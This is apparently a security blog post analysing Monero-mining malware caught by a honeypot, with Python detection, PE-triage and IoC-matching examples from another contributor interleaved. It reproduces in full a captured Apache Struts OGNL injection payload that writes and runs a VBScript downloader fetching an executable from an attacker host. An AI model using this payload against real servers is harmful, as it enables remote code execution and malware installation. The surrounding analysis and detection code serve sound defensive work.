Saturday, December 8, 2018

Monero Mining Malware from Honeypot

Recently in a honeypot, I observed miscreants probing for a vulnerable Apache Struts server running on Windows Server.  Below is the GET request that was captured; note that the OGNL payload is delivered in the Content-Type header:
SrcIP:182.247.95.237 
HTTPCode:200 
HTTPVerb:GET 
URI:/index.do 
UserAgent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) 
Headers:
Cache-Control:no-cache,
Connection:Keep-Alive,
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd /c echo Set Post = CreateObject("Msxml2.XMLHTTP") >>C:/5.vbs&
echo Set Shell = CreateObject("Wscript.Shell") >>C:/5.vbs&
echo Post.Open "GET","http://a46.bulehero.in/download.exe",0 >>C:/5.vbs&echo Post.Send() >>C:/5.vbs&echo Set aGet = CreateObject("ADODB.Stream") >>C:/5.vbs&echo aGet.Mode = 3 >>C:/5.vbs&echo aGet.Type = 1 >>C:/5.vbs&echo aGet.Open() >>C:/5.vbs&echo aGet.Write(Post.responseBody) >>C:/5.vbs&echo aGet.SaveToFile "C:/Windows/temp/download.exe",2 >>C:/5.vbs&echo wscript.sleep 10000>>C:/5.vbs&echo Shell.Run ("C:/Windows/temp/download.exe")>>C:/5.vbs&C:/5.vbs').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())},

Accept:text/html, application/xhtml+xml, */*,
Accept-Encoding:gbk, GB2312,
Accept-Language:zh-cn,
Host:x.x.x.x:8000
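As an added example (my code, not from the post), here is a small defender-side detector in Python for the pattern in the captured request: Struts OGNL injection in the Content-Type header, where the OGNL expression assembles a VBScript downloader with echo redirection. It runs the signatures over a constructed set of headers, one of them an abbreviated excerpt of the payload above, and returns a verdict. The signature names and exact patterns are my own choices; tune them to your traffic, since the `%{` marker alone will also fire on some legitimate template strings.

```python
import re

# Detection signatures for Struts OGNL injection carried in request headers.
# Written for this added example (defender-side detection); not from the original post.
OGNL_SIGNATURES = [
    ("ognl-expr-start", re.compile(r"%\{")),
    ("member-access-bypass",
     re.compile(r"#_memberAccess|@ognl\.OgnlContext@DEFAULT_MEMBER_ACCESS")),
    ("sandbox-clear",
     re.compile(r"getExcluded(?:PackageNames|Classes)\(\)\.clear\(\)")),
    ("process-spawn", re.compile(r"java\.lang\.ProcessBuilder")),
]

# Fragments of a VBScript downloader assembled with "echo ... >> x.vbs", as in the
# captured payload above.
DROPPER_SIGNATURES = [
    ("vbs-http-client", re.compile(r'CreateObject\("Msxml2\.XMLHTTP"\)', re.I)),
    ("vbs-stream-write", re.compile(r'CreateObject\("ADODB\.Stream"\)', re.I)),
    ("vbs-save-to-file", re.compile(r"\.SaveToFile\b", re.I)),
    ("echo-to-vbs", re.compile(r">>\s*[A-Za-z]:[\\/][^&\s]*\.vbs", re.I)),
]

# Headers in which Struts OGNL payloads have been placed; a legitimate value here is
# short and never contains an OGNL expression.
HEADERS_OF_INTEREST = {"content-type", "content-disposition"}


def scan_headers(headers):
    """Return the sorted list of signature tags that fire on the given headers.

    `headers` is a dict of header name -> value (names compared case-insensitively).
    """
    hits = set()
    for name, value in headers.items():
        if name.lower() not in HEADERS_OF_INTEREST:
            continue
        for tag, rx in OGNL_SIGNATURES + DROPPER_SIGNATURES:
            if rx.search(value):
                hits.add(tag)
    return sorted(hits)


def verdict(headers):
    """Classify a request from the signatures that fired."""
    hits = set(scan_headers(headers))
    ognl = {tag for tag, _ in OGNL_SIGNATURES} & hits
    dropper = {tag for tag, _ in DROPPER_SIGNATURES} & hits
    if ognl and dropper:
        return "struts-ognl-exploit-with-vbs-dropper"
    if ognl:
        return "struts-ognl-exploit"
    if dropper:
        return "dropper-fragment-in-header"
    return "benign"


# Constructed samples. The first Content-Type value is an abbreviated excerpt of the
# captured request above ("..." marks elided parts); the second is an ordinary upload.
CAPTURED_REQUEST = {
    "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
    "Content-Type": (
        "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
        ".(#_memberAccess?(#_memberAccess=#dm):(...))"
        ".(#cmd='cmd /c echo Set Post = CreateObject(\"Msxml2.XMLHTTP\") >>C:/5.vbs&"
        "echo aGet.SaveToFile \"C:/Windows/temp/download.exe\",2 >>C:/5.vbs&C:/5.vbs')"
        ".(#p=new java.lang.ProcessBuilder(#cmds))...}"
    ),
}
BENIGN_UPLOAD = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
}

if __name__ == "__main__":
    for label, req in (("captured", CAPTURED_REQUEST), ("benign", BENIGN_UPLOAD)):
        print(label, verdict(req), scan_headers(req))
```

Only the headers in `HEADERS_OF_INTEREST` are scanned, so an OGNL-looking string in an unrelated header does not fire; widen that set if your Struts version exposes other injection points.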


As you can see above, a file is downloaded from a46.bulehero.in.  The domain is registered through GoDaddy.  Below is the whois record that I found.  I find it fascinating that the Organization and State/Province are probably random keystrokes from a bot.
Domain Name BULEHERO.IN
Registry Domain ID D414400000006028492-AFIN
Registrar URL www.godaddy.com
Updated Date 2018-11-01T10:56:24Z
Creation Date 2018-05-09T11:12:14Z
Registry Expiry Date 2020-05-09T11:12:14Z
Registrar GoDaddy.com, LLC
Registrar IANA ID 146
Registrar Abuse Contact Email abuse@godaddy.com
Registrar Abuse Contact Phone +1.4806242505
...
Registrant Organization zanwu
Registrant State/Province uysf
Registrant Country AZ


Other subdomains that I have found associated with this malware, with the IP address and hosting organization for each:
a45.bulehero.in - 139.162.27.37 - Linode LLC in Singapore
a46.bulehero.in - 139.162.74.150 - Linode LLC in US
a47.bulehero.in - 23.239.7.210 - Linode LLC in US
a48.bulehero.in - 139.162.74.150 - Linode LLC in US
a88.bulehero.in - 139.162.71.92 - Linode LLC in US
support@linode.com

Now, going back to the download.exe file that was downloaded: examining the file, we find that it is a Windows x86 binary.


Running "upx -d" on the file decompresses it so that we can look at the binary.  I copied the original download.exe to original_download.exe because upx -d overwrites the file in place with the decompressed version.
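The two facts just established (a Windows x86 binary, UPX packed) are what a first triage pass looks for. Here, as an added example that is not from the post, is a Python triage routine that reads the COFF Machine field for the architecture and checks the section table for the UPX0/UPX1 names the packer leaves by default. It works on a constructed minimal PE image rather than any real sample, so it runs offline; the constants and the `build_sample_pe` helper are mine. A sample whose sections were renamed after packing will pass the section-name check unnoticed, so treat a negative result as "no UPX marker", not "not packed".

```python
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
ARCH_NAMES = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}

# COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes, little-endian)
COFF_HEADER_FMT = "<HHIIIHH"
SECTION_HEADER_SIZE = 40   # each IMAGE_SECTION_HEADER; the 8-byte name comes first


def triage_pe(data):
    """Minimal PE triage: architecture from the COFF header, UPX hint from section names.

    Returns a dict; is_pe stays False when the MZ/PE signatures are not where they belong.
    """
    info = {"is_pe": False, "machine": None, "arch": None, "sections": [], "upx_packed": False}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]        # offset of "PE\0\0"
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return info
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from(
        COFF_HEADER_FMT, data, e_lfanew + 4)
    info.update(is_pe=True, machine=machine, arch=ARCH_NAMES.get(machine, "other"))
    offset = e_lfanew + 24 + opt_size     # section table follows the optional header
    for _ in range(nsections):
        if offset + SECTION_HEADER_SIZE > len(data):
            break                         # truncated section table: keep what we have
        name = data[offset:offset + 8].rstrip(b"\0").decode("ascii", "replace")
        info["sections"].append(name)
        offset += SECTION_HEADER_SIZE
    # UPX names its sections UPX0/UPX1 (and UPX2) by default; absence proves nothing.
    info["upx_packed"] = any(s.startswith("UPX") for s in info["sections"])
    return info


def build_sample_pe(machine, section_names):
    """Build a constructed, non-executable PE image with only the headers triage needs."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # SizeOfOptionalHeader = 0 so the section table starts right after the COFF header
    coff = struct.pack(COFF_HEADER_FMT, machine, len(section_names), 0, 0, 0, 0, 0x0102)
    sections = b"".join(n.encode("ascii").ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos_header + b"PE\0\0" + coff + sections


if __name__ == "__main__":
    packed = build_sample_pe(IMAGE_FILE_MACHINE_I386, ["UPX0", "UPX1", ".rsrc"])
    print(triage_pe(packed))
```

To run this against a real file, pass `open(path, "rb").read()` to `triage_pe`; the result for a packed sample should line up with what `upx -d` then reports.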

Looking at the code, you can tell that it has backdoor capabilities once installed, can send emails, and much more.  Within the strings output you can see that it downloads another file, as shown below:


I then downloaded this file from that location and analyzed it further.  This malware was also UPX compressed.  I decompressed the file and conducted a basic analysis.  You can see that it contains backdoor functionality, mimikatz, a list of passwords for brute forcing, and more.  Below, the strings output is filtered for "http" using grep -i.


We find another domain involved, heroherohero.info.  That is another rabbit hole that can be investigated.  The part of the binary that caught my attention was the Cfg.ini file.  This configuration file contains the settings to run a MineXMR mining bot.  The address of the wallet is in the screenshot below:


They are utilizing the Singapore MineXMR pool location.  If you look up the address, you can see the following screenshot:


This wallet probably holds the proceeds from infected computers.  At the bottom you can see that 123 XMR is the total paid out, which at $46 per XMR amounts to $5,658.  This is not much, for the expense of others.

Here are the hashes of the malware that I collected from this analysis:

789072c3f9fe20c7aa691bb23fbfb0ce4239c659889bb1f19f9d81b8493dc117  Cfg.ini
b1017cb86875e7c4a6037db439769650384bca5439d9426cca844038a38c3f00  download.exe
bb2d54d74274dcc822481650d7025b06d0523b473b8f1b82fbd0efe67f196550  original_download.exe
06408e8b2d311cc6f7e85386f3acc4f3b3b8d7e4b4fbec27c49803ce66b2852e  original_unloadcur.exe
a7978d10e171d997a448214edca68e6c22980c0908183df59884f97ab7079322  unloadcur.exe
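Pulling the hashes above together with the indicators earlier in the post (the a45-a88 subdomains of bulehero.in, heroherohero.info, the Linode IPs and the request source IP, and the C:/5.vbs and C:/Windows/temp/download.exe paths the dropper writes), here is an added example of an IoC matcher, my code and not from the post, run over constructed telemetry records. Domains match on the apex and any subdomain, Windows paths are compared case-insensitively with either slash, and a look-alike domain is included to show it does not match.

```python
# Indicators of compromise collected from the post above. The telemetry records further
# down are constructed for this example and do not come from the honeypot.
IOC_DOMAINS = {"bulehero.in", "heroherohero.info"}      # apex domains; subdomains match too
IOC_IPS = {
    "182.247.95.237",                                     # source of the captured request
    "139.162.27.37", "139.162.74.150", "23.239.7.210", "139.162.71.92",  # a4x/a88.bulehero.in
}
IOC_PATHS = {r"c:\5.vbs", r"c:\windows\temp\download.exe"}   # written by the VBS dropper
IOC_SHA256 = {
    "789072c3f9fe20c7aa691bb23fbfb0ce4239c659889bb1f19f9d81b8493dc117": "Cfg.ini",
    "b1017cb86875e7c4a6037db439769650384bca5439d9426cca844038a38c3f00": "download.exe",
    "bb2d54d74274dcc822481650d7025b06d0523b473b8f1b82fbd0efe67f196550": "original_download.exe",
    "06408e8b2d311cc6f7e85386f3acc4f3b3b8d7e4b4fbec27c49803ce66b2852e": "original_unloadcur.exe",
    "a7978d10e171d997a448214edca68e6c22980c0908183df59884f97ab7079322": "unloadcur.exe",
}


def matching_ioc_domain(host):
    """Return the IoC apex domain that `host` equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for apex in IOC_DOMAINS:
        if host == apex or host.endswith("." + apex):
            return apex
    return None


def normalize_path(path):
    """Windows paths compare case-insensitively and accept either slash."""
    return path.lower().replace("/", "\\")


def match_iocs(events):
    """Run the IoC set over telemetry dicts; return (event id, ioc type, matched value) tuples.

    Each event may carry any of: host (DNS/HTTP), dst_ip (network), path and sha256 (file).
    """
    hits = []
    for ev in events:
        host = ev.get("host")
        if host and matching_ioc_domain(host):
            hits.append((ev["id"], "domain", matching_ioc_domain(host)))
        if ev.get("dst_ip") in IOC_IPS:
            hits.append((ev["id"], "ip", ev["dst_ip"]))
        path = ev.get("path")
        if path and normalize_path(path) in IOC_PATHS:
            hits.append((ev["id"], "path", normalize_path(path)))
        digest = (ev.get("sha256") or "").lower()
        if digest in IOC_SHA256:
            hits.append((ev["id"], "sha256", IOC_SHA256[digest]))
    return hits


# Constructed telemetry: one DNS lookup, one outbound connection, one file write, plus noise.
SAMPLE_EVENTS = [
    {"id": 1, "kind": "dns", "host": "a46.bulehero.in"},
    {"id": 2, "kind": "net", "dst_ip": "139.162.74.150", "dst_port": 80},
    {"id": 3, "kind": "file", "path": "C:/Windows/temp/download.exe",
     "sha256": "b1017cb86875e7c4a6037db439769650384bca5439d9426cca844038a38c3f00"},
    {"id": 4, "kind": "dns", "host": "www.example.com"},
    {"id": 5, "kind": "net", "dst_ip": "192.0.2.10", "dst_port": 443},
    {"id": 6, "kind": "dns", "host": "notbulehero.in"},     # looks similar, must not match
]

if __name__ == "__main__":
    for hit in match_iocs(SAMPLE_EVENTS):
        print(hit)
```

The IP matches are the weakest indicators here, since a46 and a48 already share one Linode address and shared hosting will turn over; the hashes and the dropper paths are the ones worth keeping in a long-lived rule.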

Enjoy...
